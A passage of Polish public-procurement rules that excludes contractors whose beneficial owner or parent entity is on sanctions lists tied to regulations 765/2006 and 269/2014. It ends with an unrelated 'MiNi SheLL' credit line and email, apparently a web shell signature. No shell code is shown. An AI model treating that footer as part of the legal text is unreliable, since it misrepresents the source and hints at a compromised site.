rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023r. poz. 120), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com